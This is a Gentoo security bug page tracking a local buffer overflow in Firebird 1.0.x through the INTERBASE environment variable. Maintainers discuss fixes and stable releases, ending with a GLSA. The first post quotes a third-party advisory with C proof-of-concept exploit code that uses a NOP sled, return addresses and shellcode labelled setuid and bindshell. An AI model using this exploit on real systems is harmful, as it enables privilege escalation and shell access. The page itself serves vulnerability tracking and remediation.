Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 20837 - dev-db/firebird local exploit
Summary: dev-db/firebird local exploit
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: GLSA Errors (show other bugs)
Hardware: All Linux
: Highest critical (vote)
Assignee: Gentoo Security
Depends on: 42518
  Show dependency tree
Reported: 2003-05-12 05:48 UTC by Daniel Ahlberg (RETIRED)
Modified: 2004-05-23 05:14 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-05-12 05:48:48 UTC
Firebird Local exploit 
bob <> 
Saturday 01.57.11 
-[[Dtors Security Research]]- 
-[[     ]]- 
-[Package: Firebird_1.0.2 [FreeBSD] 
-[Versions Affected: 1.0.2 < 
-[Exploit: Local Stack Overflow 
-[Date: 22/03/2003 
-[Author: && 
Firebird is a relational database offering many ANSI SQL-92 features 
that runs on Linux, Windows, and a variety of Unix platforms. Firebird 
offers excellent concurrency, high performance, and powerful language 
support for stored procedures and triggers. It has been used in 
production systems, under a variety of names since 1981.  
For more information on Firebird and InterBase, see: 
Firebird has 3 binarys [gds_inet_server, gds_drop, and gds_lock_mgr], 
which all use insufficent bounds checking in conjunction with getenv(),  
making each one 
succeptable to local exploitation. 
Firebird is by default setuid[firebird]. This exploit can lead to  
privileges, should the attacker trojan the local firebird application. 
Upon setting a large value for the INTERBASE environment variable a buffer 
can be overflowed. Links to the exploit should accompany this advisory. 
--[Please note that there is an exploit written for both versions of  
Exploiting this hole will allow the attacker to, amongst other things, 
manipulate and/or destroy the databases, and also add the option to trojan 
the firebird binaries. This will in effect allow for compromising of other 
users/root accounts. 
firebird 1.0.0 [BSD/Linux] are vulnerable. 
firebird-1.0.2 [BSD/Linux] are vulnerable. 
/* DSR-firebird.c by 
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE 
This is Proof Of concept code. 
bash-2.05a$ ./DSR-firebird 
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) ) 
( (                           by - ) ) 
Usage: ./DSR-firebird <target#>  
1. [0xbfbff75d] - gds_inet_server 
2. [0xbfbff75c] - gds_lock_mgr 
3. [0xbfbff75e] - gds_drop 
Thanks goto eSDee && ilja for helping me 
with the gds_lock_mgr problems. 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr" 
#define DROP    "/usr/local/firebird/bin/gds_drop" 
#define INET    "/usr/local/firebird/bin/gds_inet_server" 
#define LEN     1056 
char dropcode[]= 
char inetcode[]= 
char lockcode[]=  
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" //setuid[firebird] by  
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53" //fork() bindshell by eSDee 
char *decide(char *string) 
    if(!(strcmp(string, "1"))) 
      return((char *)&inetcode); 
    if(!(strcmp(string, "2"))) 
      return((char *)&lockcode); 
    if(!(strcmp(string, "3"))) 
      return((char *)&dropcode); 
int main(int argc, char **argv) 
        unsigned long ret = 0xbfbff743; 
        char *selectcode; 
        char buffer[LEN]; 
        char egg[1024]; 
        char *ptr; 
        int i=0; 
        if(argc < 2) 
                printf("( ( Firebird-1.0.2 Local exploit for Freebsd  
4.7 ) )\n");  
                printf("( (                           by - ) )\n"); 
                printf("Usage: %s <target#> \n", argv[0]); 
                printf("1. [0xbfbff743] - gds_inet_server\n"); 
                printf("2. [0xbfbff743] - gds_lock_mgr\n"); 
                printf("3. [0xbfbff743] - gds_drop\n"); 
        selectcode = (char *)decide(argv[1]); 
        memset(buffer, 0x41, sizeof(buffer)); 
        ptr = egg; 
        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90; 
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i]; 
        egg[1024 - 1] = '\0'; 
        memcpy(&buffer[1052],(char *)&ret,4); 
        buffer[1056] = 0; 
        setenv("INTERBASE", buffer, 1); 
        fprintf(stdout, "Return Address: 0x%x\n", ret); 
        fprintf(stdout, "Buffer Size: %d\n", LEN); 
        fprintf(stdout, "Setuid [90]\n"); 
if(selectcode == (char *)&inetcode) 
        execl(INET, INET, NULL); 
        return 0; 
if(selectcode == (char *)&lockcode) 
        printf("\nShell is on port 45295\nExploit will hang!\n"); 
        execl(LOCK, LOCK, NULL); 
        return 0; 
if(selectcode == (char *)&dropcode) 
        execl(DROP, DROP, NULL); 
        return 0; 
        return 0; 
As stated earlier, Linux is also vulnerable. The problem here 
is that Linux by defaults sets firebird setuid root. There 
exist a few more problems with linux. For example some command 
line overflows with certain switches will allow the attacker 
to change the flow of execution, of it can be changed using 
the enviroment variable [FIREBIRD_LOCK]. 
This whole package should be revised before the next release. 
Firebird 1.0.0 exploit @ 
Firebird 1.0.2 exploit @ 
Comment 1 solar (RETIRED) gentoo-dev 2003-09-25 17:27:01 UTC
Does firebird-1.0.3 fix this?
Comment 2 Meir Kriheli (RETIRED) gentoo-dev 2003-09-30 15:48:31 UTC
According to this:

It says it fixed in ver 1.18 of jrd.c, but further investigation with webcvs:

Shows it was rolled back in ver 1.19 if gds.c cause the fix was bogus.
Looks like it wasn't fixed. Maybe it's fixed in firebird ver 1.5 
(there's some hint in the tracker link above),
but it is not released yet.
Comment 3 Meir Kriheli (RETIRED) gentoo-dev 2003-09-30 15:49:22 UTC
According to this:

It says it fixed in ver 1.18 of jrd.c, but further investigation with webcvs:

Shows it was rolled back in ver 1.19 if gds.c cause the fix was bogus.
Looks like it wasn't fixed. Maybe it's fixed in firebird ver 1.5 
(there's some hint in the tracker link above),
but it is not released yet.
Comment 4 solar (RETIRED) gentoo-dev 2003-12-10 14:47:48 UTC
Is this resolved yet? Can we close this bug.
Comment 5 Meir Kriheli (RETIRED) gentoo-dev 2003-12-12 02:51:22 UTC
No resolution yet. I've searched freebsd advisories, debian's patches with no avail.

BugTraq reports that no known vendor solution is available:

Ideas ?
Comment 6 Aida Escriva-Sammer (RETIRED) gentoo-dev 2004-03-24 07:02:54 UTC
Meir Kriheli - would you remove the affected version of Firebird (1.0-r1) so we can close this bug? Thanks. 
Comment 7 Meir Kriheli (RETIRED) gentoo-dev 2004-03-25 06:46:21 UTC
IIRC the affected versions are up to 1.0.3 (including it).
since 1.0.3 is the current stable one, we can't remove it yet.

1.5.0 is currently masked for testing. I think we should remove
older ebuilds only when 1.5.0 is stable.
Comment 8 Aida Escriva-Sammer (RETIRED) gentoo-dev 2004-03-25 08:09:43 UTC
This link states that 1.0 and 1.0.2 are affected.
Comment 9 Meir Kriheli (RETIRED) gentoo-dev 2004-03-30 01:03:00 UTC
Looks at the links I've provided in this discussion. 1.0.3
was not out yet when this was discovered. I've posted
links to cvs changelog's which say that the supposed fix
was really helping and it was rolled back.
Comment 10 Kurt Lieber (RETIRED) gentoo-dev 2004-03-30 01:06:35 UTC
what needs to happen for 1.5 to go stable?
Comment 11 Meir Kriheli (RETIRED) gentoo-dev 2004-03-30 01:24:05 UTC
A few spare hours which I can work on it, and users tetsing it.

I need to move it from inetd based to daemon (by default).
Comment 12 Meir Kriheli (RETIRED) gentoo-dev 2004-03-31 05:51:39 UTC
Committed the new ebuild (still masked).

There's a bug open about the new version (#42518),
so hopefully testers will reposnd there.
Comment 13 Thierry Carrez (RETIRED) gentoo-dev 2004-04-23 08:06:08 UTC
Looks like we had progress on #42518 : please mark the ebuild as x86 stable as soon as you estimate it meets the standards, so that we can issue the GLSA for this one.

Comment 14 Meir Kriheli (RETIRED) gentoo-dev 2004-04-24 13:15:21 UTC
I'll move it to ~x86 and see how it goes from there
Comment 15 Kurt Lieber (RETIRED) gentoo-dev 2004-05-13 09:31:14 UTC
OK, enough is enough.  This is a fairly serious exploit that allows data desctruction and trojaned binaries.

We either need to get it resolved within 24h or security mask all affected versions.  This bug has just passed it's 1 year anniversary...

timestamp: Thu May 13 16:31:06 UTC 2004
Comment 16 Meir Kriheli (RETIRED) gentoo-dev 2004-05-13 12:15:50 UTC
I thought there was a new policy forcing at
least a month from unstable to stable ones.

Anyway, I'll mark it as stable in a few hours and close
the bug the blocks this one.

Most of the delay (1 year) is the time it took the
firebird team to release 1.5.
Comment 17 Thierry Carrez (RETIRED) gentoo-dev 2004-05-14 00:32:54 UTC
Firebird 1.5 is stable -- ready for a GLSA
Comment 18 Thierry Carrez (RETIRED) gentoo-dev 2004-05-23 05:14:59 UTC
GLSA 200405-18